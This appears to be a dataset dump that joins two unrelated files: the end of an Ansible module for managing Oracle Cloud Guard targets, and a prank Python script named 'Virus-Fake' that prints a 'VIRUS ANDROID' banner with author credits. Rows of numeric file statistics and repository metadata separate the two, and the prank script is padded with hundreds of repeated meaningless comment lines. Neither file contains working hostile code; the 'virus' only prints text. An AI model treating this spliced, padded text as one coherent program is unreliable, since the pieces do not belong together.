"recommendation": "recommendation_example",
"detector": "IAAS_ACTIVITY_DETECTOR",
"service_type": "service_type_example",
"resource_type": "resource_type_example",
"details": {
"is_enabled": true,
"risk_level": "CRITICAL",
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example",
"data_type": "data_type_example",
"values": [{
"list_type": "MANAGED",
"managed_list_type": "managed_list_type_example",
"value": "value_example"
}]
}],
"condition_groups": [{
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
}
}],
"labels": [],
"is_configuration_allowed": true
},
"managed_list_types": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING"
}],
"target_responder_recipes": [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"responder_recipe_id": "ocid1.responderrecipe.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"owner": "CUSTOMER",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"responder_rules": [{
"responder_rule_id": "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"type": "REMEDIATION",
"policies": [],
"supported_modes": [],
"details": {
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
},
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example"
}],
"is_enabled": true,
"mode": "AUTOACTION"
},
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"effective_responder_rules": [{
"responder_rule_id": "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"type": "REMEDIATION",
"policies": [],
"supported_modes": [],
"details": {
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
},
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example"
}],
"is_enabled": true,
"mode": "AUTOACTION"
},
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}]
}],
"inherited_by_compartments": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecyle_details": "lifecyle_details_example",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"system_tags": {}
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.cloud_guard import CloudGuardClient
from oci.cloud_guard.models import CreateTargetDetails
from oci.cloud_guard.models import UpdateTargetDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class TargetHelperGen(OCIResourceHelperBase):
    """Supported operations: create, update, get, list and delete"""

    def get_module_resource_id_param(self):
        # Name of the module parameter that carries this resource's OCID.
        return "target_id"

    def get_module_resource_id(self):
        return self.module.params.get("target_id")

    def get_get_fn(self):
        return self.client.get_target

    def get_resource(self):
        # Fetch the current state of the target, retrying with backoff.
        target_id = self.module.params.get("target_id")
        return oci_common_utils.call_with_backoff(
            self.client.get_target, target_id=target_id,
        )

    def get_required_kwargs_for_list(self):
        # compartment_id is the only mandatory argument of list_targets.
        required = ["compartment_id"]
        return {name: self.module.params[name] for name in required}

    def get_optional_kwargs_for_list(self):
        if self._use_name_as_identifier():
            candidates = ["display_name"]
        else:
            candidates = ["display_name", "lifecycle_state"]
        params = self.module.params
        return {
            name: params[name]
            for name in candidates
            if params.get(name) is not None
            and (
                self._use_name_as_identifier()
                or not params.get("key_by")
                or name in params.get("key_by")
            )
        }

    def list_resources(self):
        # Combine required and optional filters and page through all targets.
        kwargs = oci_common_utils.merge_dicts(
            self.get_required_kwargs_for_list(), self.get_optional_kwargs_for_list()
        )
        return oci_common_utils.list_all_resources(self.client.list_targets, **kwargs)

    def get_create_model_class(self):
        return CreateTargetDetails

    def create_resource(self):
        # Create the target and wait for it to reach a terminal lifecycle state.
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.create_target,
            call_fn_args=(),
            call_fn_kwargs=dict(create_target_details=self.get_create_model(),),
            waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
            operation=oci_common_utils.CREATE_OPERATION_KEY,
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=self.get_wait_for_states_for_operation(
                oci_common_utils.CREATE_OPERATION_KEY,
            ),
        )

    def get_update_model_class(self):
        return UpdateTargetDetails

    def update_resource(self):
        # Apply the update model and wait on the lifecycle state.
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.update_target,
            call_fn_args=(),
            call_fn_kwargs=dict(
                target_id=self.module.params.get("target_id"),
                update_target_details=self.get_update_model(),
            ),
            waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
            operation=oci_common_utils.UPDATE_OPERATION_KEY,
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=self.get_wait_for_states_for_operation(
                oci_common_utils.UPDATE_OPERATION_KEY,
            ),
        )

    def delete_resource(self):
        # Delete the target and wait for the deletion to complete.
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.delete_target,
            call_fn_args=(),
            call_fn_kwargs=dict(target_id=self.module.params.get("target_id"),),
            waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
            operation=oci_common_utils.DELETE_OPERATION_KEY,
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=self.get_wait_for_states_for_operation(
                oci_common_utils.DELETE_OPERATION_KEY,
            ),
        )
# NOTE(review): get_custom_class presumably returns a user-maintained
# customization class (or a no-op placeholder when none is registered) --
# confirm in oci_resource_utils.
TargetHelperCustom = get_custom_class("TargetHelperCustom")
# Customizations take precedence over the generated implementation via MRO.
class ResourceHelper(TargetHelperCustom, TargetHelperGen):
    pass
def main():
    """Module entry point: build the argument spec and dispatch the request.

    The spec mirrors the OCI Cloud Guard CreateTargetDetails /
    UpdateTargetDetails models (see imports above). ``state=present``
    creates or updates a target; ``state=absent`` deletes it.
    """
    # Common OCI module arguments (auth options, wait options, etc.).
    module_args = oci_common_utils.get_common_arg_spec(
        supports_create=True, supports_wait=True
    )
    module_args.update(
        dict(
            display_name=dict(aliases=["name"], type="str"),
            compartment_id=dict(type="str"),
            description=dict(type="str"),
            target_resource_type=dict(
                type="str", choices=["COMPARTMENT", "ERPCLOUD", "HCMCLOUD"]
            ),
            target_resource_id=dict(type="str"),
            target_detector_recipes=dict(
                type="list",
                elements="dict",
                options=dict(
                    detector_recipe_id=dict(type="str"),
                    detector_rules=dict(
                        type="list",
                        elements="dict",
                        options=dict(
                            detector_rule_id=dict(type="str", required=True),
                            details=dict(
                                type="dict",
                                required=True,
                                options=dict(
                                    condition_groups=dict(
                                        type="list",
                                        elements="dict",
                                        options=dict(
                                            compartment_id=dict(
                                                type="str", required=True
                                            ),
                                            condition=dict(
                                                type="dict",
                                                required=True,
                                                options=dict(
                                                    kind=dict(
                                                        type="str",
                                                        required=True,
                                                        choices=["SIMPLE", "COMPOSITE"],
                                                    ),
                                                    parameter=dict(type="str"),
                                                    operator=dict(
                                                        type="str",
                                                        choices=[
                                                            "IN",
                                                            "NOT_IN",
                                                            "EQUALS",
                                                            "NOT_EQUALS",
                                                        ],
                                                    ),
                                                    value=dict(type="str"),
                                                    value_type=dict(
                                                        type="str",
                                                        choices=["MANAGED", "CUSTOM"],
                                                    ),
                                                    left_operand=dict(
                                                        type="dict",
                                                        options=dict(
                                                            kind=dict(
                                                                type="str",
                                                                required=True,
                                                                choices=[
                                                                    "COMPOSITE",
                                                                    "SIMPLE",
                                                                ],
                                                            )
                                                        ),
                                                    ),
                                                    composite_operator=dict(
                                                        type="str",
                                                        choices=["AND", "OR"],
                                                    ),
                                                    right_operand=dict(
                                                        type="dict",
                                                        options=dict(
                                                            kind=dict(
                                                                type="str",
                                                                required=True,
                                                                choices=[
                                                                    "COMPOSITE",
                                                                    "SIMPLE",
                                                                ],
                                                            )
                                                        ),
                                                    ),
                                                ),
                                            ),
                                        ),
                                    )
                                ),
                            ),
                        ),
                    ),
                    target_detector_recipe_id=dict(type="str"),
                ),
            ),
            target_responder_recipes=dict(
                type="list",
                elements="dict",
                options=dict(
                    responder_recipe_id=dict(type="str"),
                    responder_rules=dict(
                        type="list",
                        elements="dict",
                        options=dict(
                            responder_rule_id=dict(type="str", required=True),
                            details=dict(
                                type="dict",
                                required=True,
                                options=dict(
                                    condition=dict(
                                        type="dict",
                                        options=dict(
                                            kind=dict(
                                                type="str",
                                                required=True,
                                                choices=["SIMPLE", "COMPOSITE"],
                                            ),
                                            parameter=dict(type="str"),
                                            operator=dict(
                                                type="str",
                                                choices=[
                                                    "IN",
                                                    "NOT_IN",
                                                    "EQUALS",
                                                    "NOT_EQUALS",
                                                ],
                                            ),
                                            value=dict(type="str"),
                                            value_type=dict(
                                                type="str",
                                                choices=["MANAGED", "CUSTOM"],
                                            ),
                                            left_operand=dict(
                                                type="dict",
                                                options=dict(
                                                    kind=dict(
                                                        type="str",
                                                        required=True,
                                                        choices=["COMPOSITE", "SIMPLE"],
                                                    )
                                                ),
                                            ),
                                            composite_operator=dict(
                                                type="str", choices=["AND", "OR"]
                                            ),
                                            right_operand=dict(
                                                type="dict",
                                                options=dict(
                                                    kind=dict(
                                                        type="str",
                                                        required=True,
                                                        choices=["COMPOSITE", "SIMPLE"],
                                                    )
                                                ),
                                            ),
                                        ),
                                    ),
                                    configurations=dict(
                                        type="list",
                                        elements="dict",
                                        options=dict(
                                            # no_log: the key may be sensitive.
                                            config_key=dict(
                                                type="str", required=True, no_log=True
                                            ),
                                            name=dict(type="str", required=True),
                                            value=dict(type="str", required=True),
                                        ),
                                    ),
                                    mode=dict(
                                        type="str", choices=["AUTOACTION", "USERACTION"]
                                    ),
                                ),
                            ),
                        ),
                    ),
                    target_responder_recipe_id=dict(type="str"),
                ),
            ),
            lifecycle_state=dict(
                type="str",
                choices=[
                    "CREATING",
                    "UPDATING",
                    "ACTIVE",
                    "INACTIVE",
                    "DELETING",
                    "DELETED",
                    "FAILED",
                ],
            ),
            freeform_tags=dict(type="dict"),
            defined_tags=dict(type="dict"),
            target_id=dict(aliases=["id"], type="str"),
            state=dict(type="str", default="present", choices=["present", "absent"]),
        )
    )
    module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
    # The OCI Python SDK is a hard requirement; HAS_OCI_PY_SDK is set by the
    # guarded import at the top of the file.
    if not HAS_OCI_PY_SDK:
        module.fail_json(msg="oci python sdk required for this module.")
    resource_helper = ResourceHelper(
        module=module,
        resource_type="target",
        service_client_class=CloudGuardClient,
        namespace="cloud_guard",
    )
    result = dict(changed=False)
    # Dispatch: delete/update may be keyed by display name instead of OCID.
    if resource_helper.is_delete_using_name():
        result = resource_helper.delete_using_name()
    elif resource_helper.is_delete():
        result = resource_helper.delete()
    elif resource_helper.is_update_using_name():
        result = resource_helper.update_using_name()
    elif resource_helper.is_update():
        result = resource_helper.update()
    elif resource_helper.is_create():
        result = resource_helper.create()
    module.exit_json(**result)
# Standard script entry point.
if __name__ == "__main__":
    main()
| 50.196866
| 156
| 0.331184
| 5,731
| 102,502
| 5.770372
| 0.065957
| 0.041488
| 0.090475
| 0.111763
| 0.869035
| 0.836891
| 0.807499
| 0.779196
| 0.754642
| 0.722951
| 0
| 0.017276
| 0.623344
| 102,502
| 2,041
| 157
| 50.22146
| 0.839282
| 0.004302
| 0
| 0.840966
| 0
| 0.005536
| 0.846201
| 0.050476
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006543
| false
| 0.000503
| 0.004026
| 0.003523
| 0.017614
| 0.000503
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
865dc4ddf79c635bc688a33bc3eb6b1fd49bd885
| 17,227
|
py
|
Python
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import os,time,sys
from datetime import datetime
def ketik(teks):
    """Print *teks* (plus a trailing newline) one character at a time,
    pausing 10 ms between characters for a typewriter effect."""
    baris = teks + "\n"
    for huruf in baris:
        sys.stdout.write(huruf)
        sys.stdout.flush()
        time.sleep(0.01)
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
# Capture the current date components (dd, mm, YYYY).
saat_ini = datetime.now()
tgl = saat_ini.strftime('%d')
bln = saat_ini.strftime('%m')
thn = saat_ini.strftime('%Y')
# Date string "dd-mm-YYYY".
# NOTE(review): waktu_new appears unused in the rest of this script -- confirm.
waktu_new = (tgl+"-"+bln+"-"+thn)
# ANSI terminal escape sequences used for coloring the banner and prompts.
xnxx="\033[85m"
q="\033[00m"
# Background color codes.
h2="\033[40m"
b2="\033[44m"
c2="\033[46m"
i2="\033[42m"
u2="\033[45m"
m2="\033[41m"
p2="\033[47m"
k2="\033[43m"
# Bright foreground color codes.
b='\033[1;34m'
i='\033[1;32m'
c='\033[1;36m'
m='\033[1;31m'
u='\033[1;35m'
k='\033[1;33m'
p='\033[1;37m'
h='\033[1;90m'
# Combined background + bright-white foreground codes.
k3="\033[43m\033[1;37m"
b3="\033[44m\033[1;37m"
m3="\033[41m\033[1;37m"
# Clear the terminal and type out the ASCII-art banner.
os.system("clear")
ketik(m +" .---. .----------- ")
ketik(m +" / \ __ / ------ "+ k +" ["+ m +" VIRUS ANDROID"+ k +" ]")
ketik(m +" / / \( )/ ----- ")
ketik(m +" ////// ' \/ ` --- "+ p +" ➣"+ k +" Creator"+ m +" :"+ h +" ALDI BACHTIAR RIFAI")
ketik(m +" //// / // : : --- "+ p +" ➣"+ k +" Youtube"+ m +" :"+ h +" MR.1557 / B0C4H")
ketik(p +" // / / /` '-- "+ p +" ➣"+ k +" Github"+ m +" :"+ h +" https://github.com/Aldi098")
ketik(p +" // //..\\ ")
ketik(p +" ====UU====UU==== "+ k +" ["+ m +" VERSI 0.2"+ k +" ]")
ketik(p +" '//||\\` ")
ketik(p +" ''`` ")
